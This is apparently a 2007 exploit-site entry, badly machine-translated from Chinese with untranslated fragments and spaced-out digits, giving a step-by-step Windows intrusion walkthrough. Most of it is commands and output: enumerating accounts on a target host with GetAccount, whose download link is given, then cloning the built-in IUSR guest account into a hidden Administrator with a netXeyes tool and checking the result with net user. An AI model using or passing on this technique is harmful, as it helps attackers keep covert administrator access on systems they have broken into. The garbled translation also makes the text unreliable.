Remote upgrade ordinary user permissions-bug warning-the black bar safety net

2007-03-19T00:00:00
ID MYHACK58:62200714617
Type myhack58
Reporter 佚名
Modified 2007-03-19T00:00:00

Description

The steps of:

1, assuming that we pass the scanner to get a 1 9 2. 1 6 8. 0. 1 on a user test password for the test belonging to the administrators group.

2, Using the GetAccount http://www.lsky.org/download/GetAccount.exe 获得 系统 中 已经 存在 的 帐号 信息 of course the use of empty connections are also possible.

C:\>getaccount \\192.168.0.1 1

GetAccount Via SID, by netXeyes 2002/04/06

Connect To Host 192.168.0.1.... OK

Start Ememurate Account....

Name is: TsInternetUser Name is: NetShowServices Name is: NetShow Administrators Name is: IUSR_VICTIM Name is: IWAM_VICTIM Name is: zjf Name is: DHCP Users Name is: DHCP Administrators

Disconnect The Host 192.168.0.1.... OK

3, the 利用 SA.exe the Iusr_victim clone as Administrator.

C:\>ca \\192.168.0.1 test test iusr_victim password Clone the Administrator, by netXeyes 2002/04/06 Written by netXeyes 2 0 0 2, dansnow@21cn.com

Connect 192.168.0.1.... OK Get the SID of iusr_victim.... OK Prepairing.... OK Processing.... OK Clean Up.... OK

C:\>

In this case, iusr_victim become a super user, and there is having the and Administrator the same settings(Desktop, menu, etc.

In the 1 9 2. 1 6 8. 0. 1 above with the Net command to view the results:

User name IUSR_VICTIM Full Name Internet Guest Account Comment Built-in account for anonymous access to Internet I nFORMation Services User's comment Built-in account for anonymous access to Internet I nFORMation Services Country code 0 0 0 (System Default) Account active Yes Account expires Never

Password last set 2002/4/28 PM 1 0:3 1 Password expires Never Password changeable 2002/4/28 PM 1 0:3 1 Password required Yes User may change password No

Workstations allowed All Logon script User profile Home directory Last logon 2002/4/28 PM 0 9:0 2

Logon hours allowed All

Local Group Memberships Guests Global Group memberships None